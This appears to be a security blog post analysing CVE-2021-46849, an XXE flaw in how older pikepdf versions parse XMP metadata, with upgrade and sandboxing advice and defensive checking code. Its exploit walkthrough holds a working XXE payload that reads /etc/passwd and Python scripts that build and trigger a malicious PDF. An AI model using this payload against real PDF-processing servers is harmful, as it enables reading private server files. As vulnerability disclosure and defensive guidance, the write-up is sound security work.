CVE-2021-46849 - XXE Vulnerability in pikepdf's XMP Metadata Parsing (Before v2.10.0) - Deep Dive, Exploit Details, and How to Stay Safe

In the world of PDF processing, Python's pikepdf library has made a name for itself as a go-to tool for working with PDF files. But like any piece of software, it's not immune to security flaws. One particular flaw, tracked as CVE-2021-46849, lets attackers pull off an XXE (XML External Entity) attack through PDF files with embedded XMP metadata. If your application uses a pikepdf version before 2.10.0, you might be at risk.

This post goes deep into how the bug works, demonstrates a basic exploit, and gives direct advice to keep your systems safe.

In a Nutshell

- Library Affected: pikepdf
- Versions: All versions before 2.10.0
- Problem: When pikepdf reads XMP metadata from a PDF, it doesn't properly restrict XML features, allowing XML External Entity (XXE) attacks.
- Impact: A crafted PDF can make your server read local files (like /etc/passwd), make unwanted HTTP requests, or leak information.

Official References

- GitHub Security Advisory GHSA-63mv-9g85-w387
- CVE entry on NVD
- pikepdf Release Notes – 2.10.0

Understanding XXE Vulnerabilities

XXE, or *XML External Entity* attack, is a classic trick that takes advantage of how some XML parsers load and interpret entities within XML data. If not properly configured, an XML parser will allow the input document to reference external resources, possibly even files on the host machine.

In pikepdf, this risk comes into play when reading PDF files containing XMP (Extensible Metadata Platform) metadata—a chunk of XML stored inside your PDF. If your app reads or exposes this metadata, it might inadvertently give attackers a way to read files from your server.

The Problem

Here’s the basic risk: any time pikepdf (before v2.10.0) loads XMP metadata, it passes that XML to a parser that resolves external entities. Maliciously crafted XMP can direct pikepdf to load data from the server's filesystem or even from remote targets.
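To make the dangerous construct concrete, here is a minimal sketch that flags any XML document declaring a DTD, which is where external entities are defined. It uses only Python's standard-library expat bindings. The names assert_no_dtd and DTDForbidden are made up for this illustration; this is not how pikepdf implements its fix.

```python
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when an XML document contains a DOCTYPE declaration."""


def assert_no_dtd(xml_bytes: bytes) -> None:
    """Parse xml_bytes with expat and raise DTDForbidden on any DOCTYPE.

    Malformed XML still raises xml.parsers.expat.ExpatError as usual.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Entities can only be declared inside a DTD, so refusing the
        # DOCTYPE itself rules out external entity declarations too.
        raise DTDForbidden(f"DOCTYPE declaration found: {name!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    # The second argument marks this as the final chunk of input.
    parser.Parse(xml_bytes, True)


if __name__ == "__main__":
    sample = (
        b'<?xml version="1.0"?>'
        b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
        b"<a>&xxe;</a>"
    )
    try:
        assert_no_dtd(sample)
    except DTDForbidden as exc:
        print("rejected:", exc)
```

Legitimate XMP packets should not need a DTD, so rejecting every DOCTYPE is usually an acceptable trade-off for untrusted input.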

Exploit Walkthrough

Let’s say an attacker has a way to upload or submit PDFs to your server, and your backend processes them with pikepdf to read XMP.

A malicious PDF's XMP might look like this:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<x:xmpmeta xmlns:x="adobe:ns:meta/">
  <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
    <rdf:Description>
      <dangerField>&xxe;</dangerField>
    </rdf:Description>
  </rdf:RDF>
</x:xmpmeta>

When pikepdf loads this PDF and parses the XMP, &xxe; will be replaced by the contents of /etc/passwd.

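Assume a server endpoint that does something like this:

import pikepdf

def extract_xmp(pdf_path):
    """Return the parsed XMP packet of a PDF as a string."""
    with pikepdf.open(pdf_path) as pdf:
        # open_metadata() parses the XMP packet; this is the step where a
        # vulnerable pikepdf expands external entities.
        meta = pdf.open_metadata()
        # str() serializes the parsed XMP, including any expanded entity text.
        return str(meta)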

If an attacker submits a PDF with the above malicious XMP, the code will leak the target server's /etc/passwd content.
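As a defense-in-depth measure for an endpoint like the one above, the raw XMP bytes can be inspected before pikepdf parses them. The sketch below is an assumption-laden illustration, not part of pikepdf: xmp_declares_dtd and read_metadata_checked are hypothetical helper names, and the byte scan is deliberately crude (for example, it would miss a packet encoded as UTF-16).

```python
SUSPICIOUS_MARKERS = (b"<!DOCTYPE", b"<!ENTITY")


def xmp_declares_dtd(raw_xmp: bytes) -> bool:
    """Return True if the raw XMP packet appears to declare a DTD or entity."""
    return any(marker in raw_xmp for marker in SUSPICIOUS_MARKERS)


def read_metadata_checked(pdf_path):
    """Return XMP properties as a dict, refusing packets that declare a DTD.

    Hypothetical wrapper: pikepdf is imported lazily so the byte check
    above can be used and tested without it.
    """
    import pikepdf

    with pikepdf.open(pdf_path) as pdf:
        # The XMP packet is a stream referenced from the document catalog.
        stream = pdf.Root.get("/Metadata")
        if stream is None:
            return {}
        # Check the raw bytes before any XML parsing takes place.
        if xmp_declares_dtd(stream.read_bytes()):
            raise ValueError("XMP metadata declares a DTD; refusing to parse")
        meta = pdf.open_metadata()
        return dict(meta.items())
```

This does not replace upgrading. It only narrows the window if a vulnerable version is still deployed somewhere.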

Step 1: Create a malicious PDF

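You can use exiftool to inject arbitrary XMP metadata, but a short Python script works too. Note that PyPDF2's add_metadata() only writes to the document Info dictionary, not to the XMP stream that pikepdf reads, so this simplified snippet uses pikepdf itself to attach the raw packet (writing the stream does not parse it):

import pikepdf

evil_xmp = b'''<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<x:xmpmeta xmlns:x="adobe:ns:meta/">
  <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
    <rdf:Description>
      <dangerField>&xxe;</dangerField>
    </rdf:Description>
  </rdf:RDF>
</x:xmpmeta>
'''

pdf = pikepdf.Pdf.new()
pdf.add_blank_page(page_size=(72, 72))

# XMP lives in a metadata stream referenced from the document catalog (/Root).
xmp_stream = pdf.make_stream(evil_xmp)
xmp_stream["/Type"] = pikepdf.Name("/Metadata")
xmp_stream["/Subtype"] = pikepdf.Name("/XML")
pdf.Root["/Metadata"] = xmp_stream

pdf.save("evil.pdf")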

Step 2: Read with old pikepdf

import pikepdf

with pikepdf.open('evil.pdf') as pdf:
    meta = pdf.open_metadata()
    # open_metadata() returns a pikepdf PdfMetadata object (not a raw lxml tree);
    # str() serializes the XMP it parsed, including any expanded entity text.
    print(str(meta))

If you run this with a vulnerable pikepdf (<2.10.0), the output will include the contents of your /etc/passwd!

Upgrade!

- Fastest Fix: Upgrade to pikepdf 2.10.0 or later. This version disables external entity expansion when parsing XMP.
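To check whether a deployment is still on an affected release, a startup or CI check can compare the installed version against 2.10.0. The sketch below uses only the standard library; parse_version, is_vulnerable and installed_pikepdf_is_vulnerable are names invented for this example, and the parser deliberately ignores pre-release suffixes (the third-party packaging library is the more robust choice if you already depend on it).

```python
from importlib import metadata

FIXED_VERSION = (2, 10, 0)


def parse_version(text: str) -> tuple:
    """Turn '2.9.2' into (2, 9, 2), ignoring suffixes such as 'rc1'."""
    parts = []
    for piece in text.split(".")[:3]:
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits or 0))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_vulnerable(version_text: str) -> bool:
    """True if the given pikepdf version predates the 2.10.0 fix."""
    return parse_version(version_text) < FIXED_VERSION


def installed_pikepdf_is_vulnerable():
    """Return True/False for the installed pikepdf, or None if not installed."""
    try:
        return is_vulnerable(metadata.version("pikepdf"))
    except metadata.PackageNotFoundError:
        return None


if __name__ == "__main__":
    print("pikepdf vulnerable:", installed_pikepdf_is_vulnerable())
```

Failing a deployment when this returns True is one way to keep an old pinned dependency from slipping back in.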

Containerization

- Consider running PDF-processing code in a limited container or VM with no network/file access, so even if hit by a future XXE, the damage is limited.

Bottom Line

If your app processes PDFs from untrusted sources—and especially if you inspect their metadata—this bug matters! Upgrade pikepdf *now* and audit your code paths. Don’t let a simple metadata read open your server to file leaks.

Additional Resources and References

- CVE-2021-46849 - NVD
- pikepdf GitHub Advisory
- OWASP: XML External Entity (XXE) Processing
- pikepdf 2.10.0 Release

Stay Secure! If you use Python for PDF processing, keep your libraries up to date, and watch for these kinds of problems in all libraries that handle XML or other user-controlled data.

Timeline

Published on: 10/24/2022 14:15:00 UTC
Last modified on: 10/24/2022 16:15:00 UTC